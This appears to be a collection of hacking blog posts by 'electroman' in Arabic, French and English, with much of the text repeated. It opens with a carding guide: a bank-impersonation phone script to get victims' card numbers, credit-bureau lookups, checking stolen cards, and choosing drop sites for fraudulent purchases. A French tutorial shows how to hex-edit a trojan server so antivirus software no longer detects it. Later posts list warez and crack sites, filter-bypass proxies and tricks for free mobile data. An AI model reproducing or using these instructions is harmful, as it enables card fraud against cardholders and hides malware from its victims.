في هذا الجزء سنريكم بعض التقنيات الجديده التي تمكنك من احصول على الكروت لوحدك..سنذكر ايضا كيفيه التعرف على الكروت و معرفه ان كانت valid ام لا!!
-----------------------------------------------------------------------
اولا سأذكر طريقه TRW.و ان اعجبتك فأنا ارشح لك ان تحصل على كتاب Major havok&british bloke عن هذه الطريقه و سيعجبك كثيرا.(انا ابحث لو وجدته سأنشره هنا و على من يجده ان يتفضل بنشره!)
TRW(من فهمي لها اظن انها تخص المريكيين فقط..انا لم افهمها جيدا ارجوا ممن يعرف اكثر ان يخبرنا)
---
المودم بتاعك يجب ان يضبط هكذا:
Half duplex
7 bits
1 stop bit
even parity
dial-up:214-980-2524
اول ما تبقى online انتظر للTRW prompt و اضغط ctrl-g ،انتظر صوت beep .ثم،اكتب الID الرباعي الخاص بالstate التي يقطن بها الشخص الذي تريد بياناته...ثم اضغط RETURN.بعدها اكتب البيانات التيتريد معرفتها عن الشخص صاحب الكارت بالشكل التالي:
RTS ID/PASSWORD LASTNAME FIRSTNAME ...,STREET # FIRST CHARACTER OF STREET NAMEZIP CODE
طبعا كل هذا في نفس السطر..بعد هذا اضغط RETURN ، H-Y ، RETURN، CTRL-S
لشخص اخر قم بالكتابه بنفس الطريقه في سطر اخر
---------------------------------
getting credit limit and account #1
----------------------------------
ها هو حوار من الممكن استخدامه في الهاتف للصول على معلومات كهذه(أرأيتم..social engineering ..انه يستخدم في كل مجالات الهاكينج):
----------
انت:اهلا،هنا بنك امريكا نحن نتصل لنعلمك ان حد الvisa card الخاص بك قد ارتفع ل$1.200.00
الضحيه: لكن حد الكارت بتاعي كان دائما $10.000.00!!!!
انت: يبدو ان هناك مشكله في الكمبيوتر،ها الكارت بتاعك في متناول يدك؟هل ممكن ان تقوم بقراءه الارقام المكتوبه ؟
الضحيه: حسنا،انها 9834 864 874 9857
انت: شكرا.سأتحقق من هذا الخطأ بنفسي.حالا...
---------
طريقه اخرى هي الحصول على هذه الكروت هي الذهاب لمحل كبير و البحث في صحائف القمامه حوله و هي ما تسمى بالdumpsting (مقزز مش كده!)
-------------------------------------
\\\\\\\\\\\\\\\\\\
تحديد الكارت الذي حصلت عليه(روعه!!)
\\\\\\\\\\\\\\\\\
------------------------------
American Express
/--------------------------
= American Express =
= 37XN NXXXXX XXXXX =
= MM/Y1 THRU MM/Y2 Y1 =
= David Lightman AX=
\--------------------------/
الرقمين الاولين دائما 37.لو الN's بين 80 و 89 اذن فهو goldذهبي و لو الn 37 فهو platinium بلاتيني
اول تاريخ هو تاريخ الذي تلقى فيه david الكرت..اما التاريخ الثاني فهو تاريخ الانتهاءexpiration date اما الy1 فلا تعني شيئا
------------------------------
MasterCard
/--------------------------\
= MasterCard (citibank)=
= 5XXX XXXX XXXX XXXX =
= XXXX AAA DD-MM-YY MM/YY =
= David Lightman =
\--------------------------/
اظن انك ستفهم هذا الكارت بسهوله..شئ واحد يجب معرفته..هذا الكارت يبدأ دائما برقم 5
----------------------------
Visa
/--------------------------
= VISA =
= Chase Manhatten =
= =
= 4XXX XXX(X) XXX(X) XXX(X)=
= MM/YY MM/YY*VISA =
= David Lightman =
\--------------------------/
هذا الكارت سهل جدا معرفته اسمه embossed عالكارت(اي يظهر بالكاربون) هناك شئ جيد..يبدأ دائما 4333 او 4444
-----------------------------
Wells Fargo
/--------------------------\
= David Lightman =
= MM/YY - MM/YY =
= 4024 0071 XXX(X) XXX(X) =
= L _/ =
\--------------------------/
هذا من الكروت الظريفه..لو بدأ ب 4024 0071(اقلب شمال عشان تفهم) اذن فاعرف ان معك واحد.ايضا لو ال"-" بين التواريخ "*" فاعرف انه gold card و لو الL متبوعه ب'_/' بقت "C" فاعرف انه classic card و لو الL بقتP يبقى premier card.......
---------------------------
\\\\\\\\\\\\\
اختبار الكروت
\\\\\\\\\\\\
للأسف شباب هذه قطعه بسيطه لكن لم افهمها لذا سأكتبه بالانجليزيه و على من يفهمها ان يترجمها و ينشرها مع الشكر:
To determine if the cards are any good or not is pretty easy. You go into the store you ripped these things off from and look by their phone. You should see a number and almost allways a merchant number. Another way to find these numbers is to wait untill they dial the numbers. Try to remeber the numbers that they dial. This method is a little better for sometimes written numbers in the stores are forgotten about and might have been changed since the last time they had changed the written copy. Yes, some Target workers are smart enough to memorize a number, and mabye even a merchant number.
When you call this number, and you get passed all the "red tape", then ask if the credit card number is clear for the amount you want to spend.
Ask the operator to cancel the auto withdrawal and hope she will, not many operators are that dumb.
--------------|
الجزء الثالث |
--------------|
The Dropsite(مركز اسقاط المسروقات!!)
\\\\\\\\\\\\\
يجب ان تجد مكانا آمنا لكل الذي اشتريته بالبطاقات المزوره.لو كنت تريد ان تدخل في العميق،ابعثهم على منزلك!!
لتحصل على dropsite جيد يجب ان تجد منزل مهجور.لكن يجب ان يكون منظره كما ان به حياة...عندما تكون جاهزا لطلب الاشياء التي ستشتريها،افعل ذلك ليلا.و اترك رساله عالباب بأن لديك عمل ليلا و ان يتركوا المشتروات في الحديقه الخلفيه.هذه افضل طريقه في رأيي لكن.سأخبرك بطرق اخرى.
استأجر مكانا لمده بسيطه..حتى تحصل على ما تريد و الغي الايجار و اختره مكانا بعيدا عن منزلك حتى تستطيع بعدها الاختفاء من المنطقه.
و هذه اخر طريقه تعتمد عالهاتف اقرأ هذه المحادثه بيني و شركه سوني:
انا:اهلا.انا فلان الفلاني و انا نهتم بالعرض ا
لخاص بجهاز سوني الجديد.و احب ان اتكلم مع احد في الامر
العامل:اكيد.سأخبرك بكل ما يهمك(...كلام عن الجهاز...)
انا:حسنا..يبدوا ان هذا ما احتاجه فعلا.هل استطيع شراءه بالفيزا و يأتي ابن عمي بعد ذلك لأخذه لأني مريض و لا استطيع الخروج؟؟
العامل:طبعا نحن في الخدمه ...الخ..
لكن انا لا احبذ هذه الطريقه..انا افضل الاولى.لكن as u like
الآن اليك تلك النصيحتين:
1-يفضل عندما تتصل للشراء ان تفعل ذلك ليلا ..ساعتها يكون الoperators متعبون و لا يتذكرون ما حدث بعدها
2-اياك اياك من استخدام نفس الdropsite مرتين..عندما تستخدم مكانا ما و تنتهي..انسااااه تماما
و نصيحه اخيره:
الكثير من الهاكرز ماتوا بتلك الطريقه
Many hackers died that way
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
انتهى الكتاب......
ELEctroman
the new is never be dead with the king
exclusive
voila des sites nv et teste par notre équipe plus que 25 fois
site pour navigation anonyme en https : ça marche sur pc et gsm
electroman hacking surfing free
https://gmail.google.com/?dest=http%3A%2F%2Fblablabla.
https://freeonlineproxy.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://unblck.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://helloschool.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://blackdile.com/cgi-bin/nph-gov.aspx/000110A/687474702s7777772r676s6s676p652r636s6q2s
https://ww2.theevader.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29t&hl=1111101001 best had sa"a
https://www.dubaiproxy.com/surf/index.php?q=d3d3Lmdvb2dsZS5jb20%3D&hl=3ed
https://proxyman.co.cc/anonymproxy.info/index.php?q=aHR0cDovL3d3dy5nb29nbGUuc2Uv
https://0302.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5mcg%3D%3D&b=61
https://z-80.com
https://www.coolpanda.
https://www.ninjacloak.com/index.php/1010110A/9bd94580370c55a29ff83d6f7360d14ff55344431278ce4b33a017100?hl=fr&q=hi&btnG=Recherche+Google&lr=
https://www.amgstealth.com/browse.php?u=aHR0cDovL3d3dy5nb29nbGUuY29t&b=15
https://www.pagewash.com/nph-secure.cgi/000110A/uggcf:/=2fjjj.tbbtyr.pbz/nppbhagf/FreivprYbtva=3ffreivpr=3dznvy&cnffvir=3dgehr&ez=3dsnyfr&pbagvahr=3duggcf=253N=252S=252Sznvy.tbbtyr.pbz=252Sznvy=252S=253Suy=253Qse=2526gno=253Qjz=2526afe=253Q1=2526hv=253Qugzy=2526ml=253Qy&ygzcy=3dqrsnhyg&ygzcypnpur=3d2&uy=3dse
voila des sites nv et teste par notre équipe plus que 25 fois
site pour navigation anonyme en https : ça marche sur pc et gsm
electroman hacking surfing free
https://gmail.google.com/?dest=http%3A%2F%2Fblablabla.
https://freeonlineproxy.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://unblck.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://helloschool.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://blackdile.com/cgi-bin/nph-gov.aspx/000110A/687474702s7777772r676s6s676p652r636s6q2s
https://ww2.theevader.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29t&hl=1111101001 best had sa"a
https://www.dubaiproxy.com/surf/index.php?q=d3d3Lmdvb2dsZS5jb20%3D&hl=3ed
https://proxyman.co.cc/anonymproxy.info/index.php?q=aHR0cDovL3d3dy5nb29nbGUuc2Uv
https://0302.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5mcg%3D%3D&b=61
https://z-80.com
https://www.coolpanda.
https://www.ninjacloak.com/index.php/1010110A/9bd94580370c55a29ff83d6f7360d14ff55344431278ce4b33a017100?hl=fr&q=hi&btnG=Recherche+Google&lr=
https://www.amgstealth.com/browse.php?u=aHR0cDovL3d3dy5nb29nbGUuY29t&b=15
https://www.pagewash.com/nph-secure.cgi/000110A/uggcf:/=2fjjj.tbbtyr.pbz/nppbhagf/FreivprYbtva=3ffreivpr=3dznvy&cnffvir=3dgehr&ez=3dsnyfr&pbagvahr=3duggcf=253N=252S=252Sznvy.tbbtyr.pbz=252Sznvy=252S=253Suy=253Qse=2526gno=253Qjz=2526afe=253Q1=2526hv=253Qugzy=2526ml=253Qy&ygzcy=3dqrsnhyg&ygzcypnpur=3d2&uy=3dse
Imedia and maroc telecome your GPRS confeguration is here is here...//// maroc telecome? meditel? envoiyer votre configuration gprs
vous ete client chez meditel ou bien maroc telecome tu vx avoir ta configuration gprs gratuitement voila la solution :
maroc telecome : http://www.mobileiam.ma/param_mobile.asp
meditel : http://meditel.dmc3.sicap-france.com/frontoffice.view
notez bien que tu doit avoir le gprs activer sur ta carte si vous ne savez pas apellez :
meditel : 121
maroc telecome :888
mr electroman news merci et bonne journée
maroc telecome : http://www.mobileiam.ma/param_mobile.asp
meditel : http://meditel.dmc3.sicap-france.com/frontoffice.view
notez bien que tu doit avoir le gprs activer sur ta carte si vous ne savez pas apellez :
meditel : 121
maroc telecome :888
mr electroman news merci et bonne journée
weebo get fast ur connection with firefox / avoir weebo rapide avec firefox
to have a fast weebo with firefox please fellow the instruction :
Clearing Your Cache/Cookies
Many issue can be alleviated by clearing your browser's Cache and cookies. Before you clear your cache and cookies for the first time, close all of your browsers, then open up a new one.
For Firefox users:
1. Click on “Tools” at the top of the browser window
2. Select “Clear Private Data” from the drop-down menu
3. Put a check mark next to “Cache” and “Cookies”
4. Click on the “Clear Private Data Now” button
Clearing Your Cache/Cookies
Many issue can be alleviated by clearing your browser's Cache and cookies. Before you clear your cache and cookies for the first time, close all of your browsers, then open up a new one.
For Firefox users:
1. Click on “Tools” at the top of the browser window
2. Select “Clear Private Data” from the drop-down menu
3. Put a check mark next to “Cache” and “Cookies”
4. Click on the “Clear Private Data Now” button
msn 8 avec gprs maroc telecome connection presenter par electroman
c'est vos avez une connection iam pirater sur votre pc (voire notre article sur internet gratuit) voila un site ki peux eter utile pour toi de chatter envoyer vos photos et mem avoir une discution rapide
https://meebo.com
mr electroman 078324021
https://meebo.com
mr electroman 078324021
c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts
presenter par electroman
c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts
voila le lien www.hackthev3.com have fun
c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts
voila le lien www.hackthev3.com have fun
Comment intercepter la signature d'un virus et la changer
Comment intercepter la signature d'un virus et la changer...
Tout d'abord, Qu est ce une signature ???
Une signature est un petit bout de code en Hexadecimal propre a un trojan, qui est détecté par les antivirus.
A quoi peut servir de connaitre ces signatures ?
Si vous savez ou se trouve les signatures , vous pouvez les modifier en Héxadécimal afin de rendre votre trojan indétectable par les AV.
------------------------------
Vous aurez besoin de :
-AVPOFFSET
-Kaspersky (installer sur votre ordinateur)
-Hexiwin (www.telecharger.com), ou un autre logiciel du même genre...
-Un serveur de trojan qui n'a pas été modifié (c'est à dire : non Packer, crypté, bindé, etc...)
------------------------------
Pour commencer, désactivez votre A-V. Ensuite allez dans le répertoire ou il y a les fichiers ".AVC" (exemple : " C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Lite\BASES ").
Si c'est différent chez vous faite tout simplement une recherche sur votre disque dur, de fichiers avec une extension : " .AVC " vous aurez ainsi le répertoire .
Dans ce repertoire vous mettez le programme AVPOFFSET.EXE et le SERVER.EXE.
Ensuite ouvrez une fenêtre MS DOS (démarrer puis exécuter et command) .Allez dans le répertoire ou vous avez mis AVPOFFSET et tapé ceci :
" AVPOFFSET SERVER.EXE "
Ensuite patientez (cela dure +- 1-2minutes)
Puis vous obtiendrez ceci:
SERVER.EXE infected: backdoor xxxxxx
Signature 1 found :
Offset : 511854 ( 7CF6eh)
Length : 7 ( 7h)
checksum: (2FCC5587h)
Signature 2 found:
Offset : 515903 ( 7DF3FH)
Length : 255 ( FFH)
Checksum: ( 5574DDD9H)
Ce qui est écrit ci-dessus est fondamental pour la suite.
Ouvrer ensuite "SERVER.EXE" avec HEXIWIN.
Puis faites " EDIT" puis "GOTO..."A coté d'offset" tapez "511854" et coché la case "DEC" ("511854" est l'offset de la 1 ère signature en Décimal)
Une autre solutions : vous pouviez taper aussi " 7CF6e " et coché la case "hexadécimal" Cela revient au même sauf que cette fois ci l'offset est écrit en Hexadécimal.
Ensuite vous devez obtenir de ce style-ci :
756E5365727669636573000000FFFFFFFF (hexadecimal)
RunServices....... (Ascii)
Cette signature est facile a modifier puisqu'elle détecte seulement par du texte. Dans cet exemple elle détecte le Texte " RunServices "
Pour vous débarrasser de cette signature, il suffit de modifier un peu le texte en ajoutant par exemple des majuscule ou des minuscules. voila qq exemple :
exemple: RunServices ==> runservices ==> RuNServices
Il y a évidemment plein de possibilités de modifications, mais la chose a ne surtout pas faire c'est d'enlever ou d'ajouter un caractère, ce qui aurait pour conséquence que le serveur ne fonctionne pas.
------------------------------
Etudions maintenant la deuxième signature...
Retournez dans " EDIT" puis " GOTO ",tappez l'offset de la 2 ème signature (515903 en décimal)
Vous obtenez ensuite ceci :
8D45F8
Ceci n'est plus une signature aussi simple que la précédente :
Ecrite en hexadécimal,elle est en fait un " LEA EAX,Dword ptr [ebp-08] en assembleur.
Cela signifie que c'est une inscription dans le registre.
Il faut alors trouver une instruction équivalente à celle ci.(avec le même alogorythme)
Bon la y a pas 36 solutions, il faut avoir qq bases en assembleur , j'vous donne l équivalent :
exemple: LEA EAX,Dword ptr [ebp-08] ==> Mov EaX,Dword Ptd ds:[Ebp-08] (un équivalent de cette signature)
Normalement, votre serveur est ensuite plus détecté, ce qui est bien utile , si vous êtes un adepte des trojans célèbres comme subseven, optix pro, etc..
Tout d'abord, Qu est ce une signature ???
Une signature est un petit bout de code en Hexadecimal propre a un trojan, qui est détecté par les antivirus.
A quoi peut servir de connaitre ces signatures ?
Si vous savez ou se trouve les signatures , vous pouvez les modifier en Héxadécimal afin de rendre votre trojan indétectable par les AV.
------------------------------
Vous aurez besoin de :
-AVPOFFSET
-Kaspersky (installer sur votre ordinateur)
-Hexiwin (www.telecharger.com), ou un autre logiciel du même genre...
-Un serveur de trojan qui n'a pas été modifié (c'est à dire : non Packer, crypté, bindé, etc...)
------------------------------
Pour commencer, désactivez votre A-V. Ensuite allez dans le répertoire ou il y a les fichiers ".AVC" (exemple : " C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Lite\BASES ").
Si c'est différent chez vous faite tout simplement une recherche sur votre disque dur, de fichiers avec une extension : " .AVC " vous aurez ainsi le répertoire .
Dans ce repertoire vous mettez le programme AVPOFFSET.EXE et le SERVER.EXE.
Ensuite ouvrez une fenêtre MS DOS (démarrer puis exécuter et command) .Allez dans le répertoire ou vous avez mis AVPOFFSET et tapé ceci :
" AVPOFFSET SERVER.EXE "
Ensuite patientez (cela dure +- 1-2minutes)
Puis vous obtiendrez ceci:
SERVER.EXE infected: backdoor xxxxxx
Signature 1 found :
Offset : 511854 ( 7CF6eh)
Length : 7 ( 7h)
checksum: (2FCC5587h)
Signature 2 found:
Offset : 515903 ( 7DF3FH)
Length : 255 ( FFH)
Checksum: ( 5574DDD9H)
Ce qui est écrit ci-dessus est fondamental pour la suite.
Ouvrer ensuite "SERVER.EXE" avec HEXIWIN.
Puis faites " EDIT" puis "GOTO..."A coté d'offset" tapez "511854" et coché la case "DEC" ("511854" est l'offset de la 1 ère signature en Décimal)
Une autre solutions : vous pouviez taper aussi " 7CF6e " et coché la case "hexadécimal" Cela revient au même sauf que cette fois ci l'offset est écrit en Hexadécimal.
Ensuite vous devez obtenir de ce style-ci :
756E5365727669636573000000FFFFFFFF (hexadecimal)
RunServices....... (Ascii)
Cette signature est facile a modifier puisqu'elle détecte seulement par du texte. Dans cet exemple elle détecte le Texte " RunServices "
Pour vous débarrasser de cette signature, il suffit de modifier un peu le texte en ajoutant par exemple des majuscule ou des minuscules. voila qq exemple :
exemple: RunServices ==> runservices ==> RuNServices
Il y a évidemment plein de possibilités de modifications, mais la chose a ne surtout pas faire c'est d'enlever ou d'ajouter un caractère, ce qui aurait pour conséquence que le serveur ne fonctionne pas.
------------------------------
Etudions maintenant la deuxième signature...
Retournez dans " EDIT" puis " GOTO ",tappez l'offset de la 2 ème signature (515903 en décimal)
Vous obtenez ensuite ceci :
8D45F8
Ceci n'est plus une signature aussi simple que la précédente :
Ecrite en hexadécimal,elle est en fait un " LEA EAX,Dword ptr [ebp-08] en assembleur.
Cela signifie que c'est une inscription dans le registre.
Il faut alors trouver une instruction équivalente à celle ci.(avec le même alogorythme)
Bon la y a pas 36 solutions, il faut avoir qq bases en assembleur , j'vous donne l équivalent :
exemple: LEA EAX,Dword ptr [ebp-08] ==> Mov EaX,Dword Ptd ds:[Ebp-08] (un équivalent de cette signature)
Normalement, votre serveur est ensuite plus détecté, ce qui est bien utile , si vous êtes un adepte des trojans célèbres comme subseven, optix pro, etc..
site web pour tt vos telechargement derb ralef cest ici
derb ralef
humm logicielles a 10dh tt le derb ralef c'est d'ici ils télécharge et ils vents
alors profiter
catégorie 1 présent par mr electroman
http://www.pegasoft.cz/
http://www.ddlworld.com/
http://www.bg-warez.org
http://www.101uses.com/ ãÊÚÏÏ ÇáæÙÇÆÝ
http://stormzone.org/news.php
http://qpxqp.com/weblog.php/weblog.php?id=C0_1_1
http://www.wolkysoft.us
http://www.soft-best.net
http://www.directwarez.com/ddl.php?page=1
catégorie 2
1. http://www.downshow.com
2. http://www.fixdown.com
3. http://www.ttdown.com
4. http://www.cnyou.com
5. http://www.soft168.com
6. http://www.soft163.com
7. http://www.99soft.com
8. http://www.jetdown.com
9. http://www.1777.net
10. http://www.chinesejia.com
11. http://www.shunsheng.yeah.net
12. http://www.mylizi.com
13. http://www.soft888.com
14. http://www.vdown.net
15. http://www.ttxz.com
16. http://www.winzheng.com
17. http://www.cn911.comwww.ok911.com
18. http://www.crsky.net
19. http://www.ynkm.com
20. http://www.5324.net
21. http://www.soft.88oo.com
22. http://www.iskydown.com
23. http://www.downbest.net/?1key.126.com
24. http://www.pcsight.com
25. http://www.downsoft.net
26. http://www.softicp.com
27. http://www.heibai.net
28. http://www.hanzify.org
29. http://www.911joy.com
30. http://www.downme.com
31. http://www.soft999.com
32. http://www.51xz.net
33. http://www.ydxz.cn.st
34. http://www.cehgx.126.com
35. http://www.xpblue.com
36. http://www.zhtx.net
37. http://www.whatisnet.net
38. http://www.cyoo.net
39. http://www.adownb.com
40. http://www.weste.netwww.softuser.com
41. http://www.9iv.com/down/
42. http://www.fbstu.com/index.asp
43. http://www.gupin.com
44. http://sz1001.net/
45. http://www.258soft.com/
pour les crack et serial
http://world.altavista.com/
http://www.systransoft.com
http://www.serilas.com
mr electroman
humm logicielles a 10dh tt le derb ralef c'est d'ici ils télécharge et ils vents
alors profiter
catégorie 1 présent par mr electroman
http://www.pegasoft.cz/
http://www.ddlworld.com/
http://www.bg-warez.org
http://www.101uses.com/ ãÊÚÏÏ ÇáæÙÇÆÝ
http://stormzone.org/news.php
http://qpxqp.com/weblog.php/weblog.php?id=C0_1_1
http://www.wolkysoft.us
http://www.soft-best.net
http://www.directwarez.com/ddl.php?page=1
catégorie 2
1. http://www.downshow.com
2. http://www.fixdown.com
3. http://www.ttdown.com
4. http://www.cnyou.com
5. http://www.soft168.com
6. http://www.soft163.com
7. http://www.99soft.com
8. http://www.jetdown.com
9. http://www.1777.net
10. http://www.chinesejia.com
11. http://www.shunsheng.yeah.net
12. http://www.mylizi.com
13. http://www.soft888.com
14. http://www.vdown.net
15. http://www.ttxz.com
16. http://www.winzheng.com
17. http://www.cn911.comwww.ok911.com
18. http://www.crsky.net
19. http://www.ynkm.com
20. http://www.5324.net
21. http://www.soft.88oo.com
22. http://www.iskydown.com
23. http://www.downbest.net/?1key.126.com
24. http://www.pcsight.com
25. http://www.downsoft.net
26. http://www.softicp.com
27. http://www.heibai.net
28. http://www.hanzify.org
29. http://www.911joy.com
30. http://www.downme.com
31. http://www.soft999.com
32. http://www.51xz.net
33. http://www.ydxz.cn.st
34. http://www.cehgx.126.com
35. http://www.xpblue.com
36. http://www.zhtx.net
37. http://www.whatisnet.net
38. http://www.cyoo.net
39. http://www.adownb.com
40. http://www.weste.netwww.softuser.com
41. http://www.9iv.com/down/
42. http://www.fbstu.com/index.asp
43. http://www.gupin.com
44. http://sz1001.net/
45. http://www.258soft.com/
pour les crack et serial
http://world.altavista.com/
http://www.systransoft.com
http://www.serilas.com
mr electroman
imedia connection gratuit
internet gratuit avec le service imedia comment.?
pour avoir imedia gratuit sur ton mobile enter ces paramters svp
avant tt assurer que ta carte Sim et active gprs si nn appelle 121
comment connaitre la cart si activer ou bien nn bah si ta jamais apller 121 alors votre cart nest pas active activer la ou bien si ta un nokia un singe G apparaitre sur onglet resau ou bien de flèche ce montre
manuel
proxy 10.8.8.8
apn:wap.meditel.ma
id utilisateur MEDIWAP
mot de passe :MEDIWAP
authentification : sécurise
automatique
entrer dans ce site et env les paramètres a ton mobile puis changer onglet sécurité en activer
http://meditel.dmc3.sicap-france.com/frontoffice.view
remarque si votre mobile acceptes le certificat shh et rsa si nn tu px pas accéder gratuitement plus d'information sur shh et rsa voire article sur imedia
c'est tt merci
pour avoir imedia gratuit sur ton mobile enter ces paramters svp
avant tt assurer que ta carte Sim et active gprs si nn appelle 121
comment connaitre la cart si activer ou bien nn bah si ta jamais apller 121 alors votre cart nest pas active activer la ou bien si ta un nokia un singe G apparaitre sur onglet resau ou bien de flèche ce montre
manuel
proxy 10.8.8.8
apn:wap.meditel.ma
id utilisateur MEDIWAP
mot de passe :MEDIWAP
authentification : sécurise
automatique
entrer dans ce site et env les paramètres a ton mobile puis changer onglet sécurité en activer
http://meditel.dmc3.sicap-france.com/frontoffice.view
remarque si votre mobile acceptes le certificat shh et rsa si nn tu px pas accéder gratuitement plus d'information sur shh et rsa voire article sur imedia
c'est tt merci
IMEDIA et il gratuit .??
pour quoi i media est gratuit avec des utilisateur de service mais il ne marche pas avec des autres membres du service imedia même si l'option du sécurité et active?.?
réponse : après des longes recherches que je fais personnellement je trouve que le secret c'est dans les certificats de identification en gros c'est le shh et rsa plus dinfo sur google
si votre gsm utilise les certificat shh ou bien rsa votre téléphone peux ce connecter a internet gratuitement mais si c'est le contraire vos ne pouvez pas alors il faut payé pour ça :)
et c'est pour ce la en trouve que il y a des membre qui utilise gratuitement le service après avoirs activer loption de sécurité et d'autre malgré ça ne peuvent pas ce connecter
merci votre frer amine raghib alias electroman
réponse : après des longes recherches que je fais personnellement je trouve que le secret c'est dans les certificats de identification en gros c'est le shh et rsa plus dinfo sur google
si votre gsm utilise les certificat shh ou bien rsa votre téléphone peux ce connecter a internet gratuitement mais si c'est le contraire vos ne pouvez pas alors il faut payé pour ça :)
et c'est pour ce la en trouve que il y a des membre qui utilise gratuitement le service après avoirs activer loption de sécurité et d'autre malgré ça ne peuvent pas ce connecter
merci votre frer amine raghib alias electroman
attention maroc telecome free connection to ur pc
how to get free connection to ur pc via gprs connection ???
humm is easy
what do you need before
cabel: between ur pc and gsm phone
pc suit : if u have a cabel for ur phone u need a driver+ pc suit is also in ur cd or tray to search and download ur dirver.
each gsm has proper dirver so if u have like for exmpel nokia u must found pc suit for nokia and download it
firefox: if u want have a fast connection than u must have download firefox is usiful than internet explorer
sll surfing link : the sll is a secure serfing but is not all u must be in ssl mode and anonymos so for this reason this is the anonymos browser that u must us
https://linkitto.com
https://www.beatfiltering.com
dont froget if the first browser is blocked tray the secound and vers versa
ok after have the tooles let's go
1 install ur pc suit
2 install ur firefox
2 go to ur pc suit and in internet insert this configuration
acess point : mmsiam
user : let the box blank
password : let the box blank
after that push connect
after connection go to firefox in tools go to option and after that to advance and network go to setting and slect manuel proxy and insert this configuration
proxy 10.16.35.50 port 8080
slect ok and exit
go to adress insert https://linkitto.com
after the page has been download insert in the blank box ur adress and have a nice surfing
humm is easy
what do you need before
cabel: between ur pc and gsm phone
pc suit : if u have a cabel for ur phone u need a driver+ pc suit is also in ur cd or tray to search and download ur dirver.
each gsm has proper dirver so if u have like for exmpel nokia u must found pc suit for nokia and download it
firefox: if u want have a fast connection than u must have download firefox is usiful than internet explorer
sll surfing link : the sll is a secure serfing but is not all u must be in ssl mode and anonymos so for this reason this is the anonymos browser that u must us
https://linkitto.com
https://www.beatfiltering.com
dont froget if the first browser is blocked tray the secound and vers versa
ok after have the tooles let's go
1 install ur pc suit
2 install ur firefox
2 go to ur pc suit and in internet insert this configuration
acess point : mmsiam
user : let the box blank
password : let the box blank
after that push connect
after connection go to firefox in tools go to option and after that to advance and network go to setting and slect manuel proxy and insert this configuration
proxy 10.16.35.50 port 8080
slect ok and exit
go to adress insert https://linkitto.com
after the page has been download insert in the blank box ur adress and have a nice surfing
driver adress web site
hi !!! and welcome
mr amine from morocco
age ;22
my mission is to help u in ur life
my pics here u found it
http://www.fileden.com/files/2008/6/1/1939264/17022008%28006%29.jpg :) dont worrey is not trojan
ok let's start my first topic
i choose for u the best web site to found your driver who u looking up have fun -eng-
je choisie pour vous les meilleur adresse web pour vos driver
http://www.driverzone.com/
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://driverpacks.net/Projects/DriverPacks/
http://driversguide.com/
http://www.totallydrivers.com/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/
Direct X:
http://www.microsoft.com/windows/directx/default.aspx
Video/graphics drivers:
Nvidia:
http://www.nvidia.com/content/drivers/drivers.asp
Ageia:
http://www.ageia.com/products/drivers.html
Ati:
http://www.ati.com/support/driver.html
Tv Tuner Cards:
http://www.tv-cards.com/drivers.php
Sound Drivers:
Creative Labs Sound Blaster:
http://us.creative.com/support/downloads/
Part Manufacturer Drivers:
Hp:
http://www.hp.com/country/us/en/support.html
Xfx:
http://www.xfxforce.com/web/support/drivers.jspa
Asus:
http://support.asus.com/faq/faq.aspx
D-link:
http://support.dlink.com/downloads/
Lg:
http://www.lge.com/support/software.jsp
Cannon:
http://www.usa.canon.com/consumer/co...wnloadIndexAct
Lexmark:
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
Chaintech:
http://www.chaintechusa.com/tw/eng/Download/
Msi:
http://www.msi.com.tw/program/suppor...t_dvr_list.php
Biostar:
http://www.biostar-usa.com/downloadmain.asp
Razer:
http://www.razerpro.com/index.php?op...d=13&Itemid=27
Abit:
http://www.abit-usa.com/downloads/
Epson:
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
Mach:
http://www.machspeed.com/products.htm
Linksys:
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
Pioneer:
http://www.pioneer-eur.com/eur/conte...t/support.html
Diamond:
http://www.diamondmm.com/newarchivelicense.php
Iomega:
https://iomega-na-en.custhelp.com/cg...ci/product.php
Mitsubishi:
http://www.mitsubishi-electric.com.a...oads/index.htm
Zboard:
http://www.zboard.com/global/downloads/drivers.asp
Belkin:
http://www.belkin.com/support/download/download.asp
Samsung:
http://www.samsung.com/support/produ...oad/index.aspx
Viewsonic:
http://www.viewsonic.com/support/drivers/index.cfm
Plextor:
http://www.plextor.com/english/suppo...s/drivers.html
Liteon-It:
http://www.liteonit.com/global/index...pper&Itemid=75
Microsoft:
http://www.microsoft.com/hardware/mo.../Download.mspx
Gigabyte:
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
Logitech:
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
Voodoo:
http://www.voodoofiles.com/
Intel:
http://downloadfinder.intel.com/scri...port_intel.asp
Cisco:
http://www.cisco.com/en/US/support/index.html
Computer Manufacturer Drivers:
Dell:
http://support.dell.com/support/downloads/index.aspx
Apple (mac) :
http://www.apple.com/downloads/macosx/drivers/
Shuttle:
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
Hp:
http://www.hp.com/country/us/en/support.html
Sony:
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
E-Machines:
http://www.emachines.com/support/product_support.html
Voodoo Game Doctor:
http://www.voodoopc.com/authorization/myaccount.aspx
Alienware:
